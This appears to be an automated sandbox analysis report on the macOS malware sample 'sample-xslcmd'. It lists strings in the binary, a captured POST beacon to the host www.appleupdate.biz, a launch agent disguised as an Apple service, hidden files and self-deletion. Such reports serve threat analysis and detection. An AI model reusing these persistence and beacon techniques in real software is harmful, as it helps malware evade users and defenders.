Loading ...

Analysis Report

Overview

General Information

Analysis ID:4
Start time:00:19:57
Start date:17/09/2014
Overall analysis duration:0h 5m 43s
Report type:full
Sample file name:sample-xslcmd
Cookbook file name:default.jbs
Analysis system description:Mac OS X, Lion, clean


Detection

StrategyReport FP/FN
Threshold malicious


Signature Overview


Networking:

barindex
Urls found in memory or binary dataShow sources
Source: sample-xslcmdString found in binary or memory: http://%s/%s
Source: sample-xslcmdString found in binary or memory: http://1234/config.htm
Source: sample-xslcmdString found in binary or memory: http://babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=%s?%d&lp=en_fr&btn
Source: sample-xslcmdString found in binary or memory: http://crl.verisign.com/pca3.crl0
Source: sample-xslcmdString found in binary or memory: http://evsecure-aia.verisign.com/evsecure2006.cer0n
Source: sample-xslcmdString found in binary or memory: http://evsecure-crl.verisign.com/evsecure2006.crl0d
Source: sample-xslcmdString found in binary or memory: http://evsecure-crl.verisign.com/pca3-g5.crl0
Source: sample-xslcmdString found in binary or memory: http://evsecure-ocsp.verisign.com0
Source: sample-xslcmdString found in binary or memory: http://evsecure-ocsp.verisign.com0=
Source: sample-xslcmdString found in binary or memory: http://logo.verisign.com/vslogo.gif0)
Source: sample-xslcmdString found in binary or memory: http://logo.verisign.com/vslogo.gif04
Source: sample-xslcmdString found in binary or memory: http://logo.verisign.com/vslogo1.gif0
Source: sample-xslcmdString found in binary or memory: http://ocsp.verisign.com0
Source: sample-xslcmdString found in binary or memory: http://th
Source: sample-xslcmdString found in binary or memory: http://translate.google.com
Source: sample-xslcmdString found in binary or memory: http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en
Source: sample-xslcmdString found in binary or memory: http://www.apple.com/dtds/propertylist-1.0.dtd
Source: sample-xslcmdString found in binary or memory: https://www.verisign.com/cps0
Source: sample-xslcmdString found in binary or memory: https://www.verisign.com/cps0=
Source: sample-xslcmdString found in binary or memory: https://www.verisign.com/rpa
Source: sample-xslcmdString found in binary or memory: https://www.verisign.com/rpa0
Found strings which match to known social media urlsShow sources
Source: sample-xslcmdString found in binary or memory: http://babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=%s?%d&lp=en_fr&btnTrUrl=Translate equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: help.apple.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST compose.aspx?s=6058ED81C06DAC84431B7823AB50C2A60B7ACD910D63AF1 HTTP/1.1 Accept: */* Referer: http://www.appleupdate.biz/windows/cartoon Accept-Language: zh-cn Accept-Encoding: gzip User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.appleupdate.biz Connection: Keep-Alive Content-Length: 112 Data Raw: 70 00 a7 94 af e4 fb 6f 53 78 80 00 5b f1 73 fc 68 fd b1 fd 84 ff 0d fd 87 ea 56 fd 6a f0 3f fb 7f ec 41 fc 3b f2 a3 fc 06 f1 d1 fd 36 f1 0c fc 66 f1 3c fd fa f1 f4 00 ea e5 f4 fa f4 ea f4 fb f8 f1 18 ff 20 e5 94 fd 46 f1 60 fd fa f1 f4 fd fa ea dc fd f2 f1 cc fd fa f1 f8 fd 5a f1 e4 fd b4 ff ec fd fa ef f4 ff fa f0 f0 fc f2 e8 9e fd Data Ascii: poSx[shVj?A;6f< F`Z
Uses network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 8000

Boot Survival:

barindex
Creates highly persistent launch servicesShow sources
Source: /Users/urugan/Desktop/sample-xslcmdLaunch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /Users/urugan/Desktop/sample-xslcmdBundle Info.plist file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist

Persistence and Installation Behavior:

barindex
Writes property list (.plist) files to diskShow sources
Source: /Users/urugan/Desktop/sample-xslcmdBinary plist file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Creates hidden files, links and/or directoriesShow sources
Source: /Users/urugan/Library/LaunchAgents/clipboarddHidden file created: /Users/urugan/Desktop/.got
Source: /Users/urugan/Library/LaunchAgents/clipboarddHidden file created: /Users/urugan/Documents/.got
Explicitly loads/starts launch servicesShow sources
Source: /bin/shLaunch agent/daemon loaded: launchctl load /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Writes FAT Mach-O files to diskShow sources
Source: /Users/urugan/Desktop/sample-xslcmdFile written: /Users/urugan/Library/LaunchAgents/clipboardd
Source: /usr/sbin/kextcacheFile written: /System/Library/Caches/com.apple.kext.caches/Startup/kernelcache.c9TF

Hooking and other Techniques for Hiding and Protection:

barindex
Moves itself during installation or deletes itself after installationShow sources
Source: /Users/urugan/Desktop/sample-xslcmdFile deleted: /Users/urugan/Desktop/sample-xslcmd
Uses network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 8000

Language, Device and Operating System Detection:

barindex
Sample file contains an Mach-O for PowerPC architecturesShow sources
Source: initial sampleStatic MACH information: PowerPC
FAT Mach-O sample file contains more than two architecturesShow sources
Source: initial sampleStatic MACH information: Mach-O fat file with 3 architectures
Queries OS software version with built-in shell commandShow sources
Source: /bin/shsw_vers executed: sw_vers -productVersion
Source: /bin/shsw_vers executed: sw_vers -productName

Yara Overview

No Yara matches

Screenshot